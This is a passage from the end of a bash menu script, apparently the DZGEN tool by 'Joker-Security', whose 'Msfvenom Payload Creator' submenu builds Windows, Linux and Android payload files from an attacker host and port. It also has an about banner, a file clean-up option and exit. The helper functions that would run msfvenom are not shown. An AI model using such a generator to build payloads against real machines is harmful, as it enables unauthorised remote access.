## ### ##  ######  ######   ##     ## ######   ## ## ## ##     ## ## ### ## \e[1;31m   
##     ##       ## ##        ##   ##  ##       ##  #### ##     ## ##     ##    
##     ## ##    ## ##         ## ##   ##       ##   ### ##     ## ##     ##    
##     ##  ######  ##          ###    ######## ##    ##  #######  ##     ##                                                                                  
                    --------------------------\e[1;96m
                    -Msfvenom Payload Creator-
                    --------------------------\e[1;31m
    1) Create Payload Linux 
    2) Create Payload Windows 
    3) Create Payload Andoird 
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '2')
    lhst
    lprt
    name
    psql
    wind
    psq
    echo -e $lightgreen "Payload SAVED IN Payload >>> Name File \e[1;37m'Your_name.exe'"
    read -p "pess any key to return ..."
    clear
    ;;
    '1')
    lhst
    lprt
    name
    psql 
    linux
    psq
    echo -e $lightgreen "Payload SAVED IN Payload >>> Name File \e[1;37m'Your_name.elf'"
    read -p "pess any key to return ..."
    clear
    ;;
    '3')
    lhst
    lprt
    name
    psql 
    android 
    psq
    echo -e $lightgreen "Payload SAVED IN Payload >>> Name File \e[1;37m'Your_name.apk'"
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
    '0')
    clear
    ;;
esac;;
'8')
   clear
   echo -e $lightgreen """
_______  ______   _______          _________
(  ___  )(  ___ \ (  ___  )|\     /|\__   __/
| (   ) || (   ) )| (   ) || )   ( |   ) (
| (___) || (__/ / | |   | || |   | |   | |
|  ___  ||  __ (  | |   | || |   | |   | |\e[1;31m
| (   ) || (  \ \ | |   | || |   | |   | |
| )   ( || )___) )| (___) || (___) |   | |
|/     \||/ \___/ (_______)(_______)   )_(\e[1;32m
╔────────────────────────────────────────────────────────────────╗
● NAME    : DZGEN                                                |
● VERSION : V1.0                                                 |
● AUTHOR  : Joker-Security                                       |
● WEBSITE : http://dev-labs.co                                   |
● GITHUB  : https://github.com/joker25000                        |\e[1;96m
● TWITTER : https://twitter.com/SecurityJoker                    |
● YOUTUBE : https://www.youtube.com/c/Professionalhacker25       |
● FACE Pg : https://facebook.com/kali.linux.pentesting.tutorials |
╚────────────────────────────────────────────────────────────────╝
● Credits To: Mascerano Bachir , MrPedroubuntu , Yacine Mohamed  |
╚────────────────────────────────────────────────────────────────╝
   """
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
'7')
    clear
    echo -e """\e[1;31m
                                                                               
  ####  #      ######   ##   #    #    #    # #####     ###### # #      ###### 
 #    # #      #       #  #  ##   #    #    # #    #    #      # #      #      
 #      #      #####  #    # # #  #    #    # #    #    #####  # #      #####  \e[1;96m
 #      #      #      ###### #  # #    #    # #####     #      # #      #     
 #    # #      #      #    # #   ##    #    # #         #      # #      #      
  ####  ###### ###### #    # #    #     ####  #         #      # ###### ###### 
                                                                               
                              -----------------------------\e[1;96m
                              -CLEAN Files Created removed-
                              -----------------------------\e[1;31m                                                               
            """
    clean 
    ;;
'0')
  echo -e $red " Good Bye !!"
  echo
  exit 0
  ;;
       esac
    done
}
main_menu
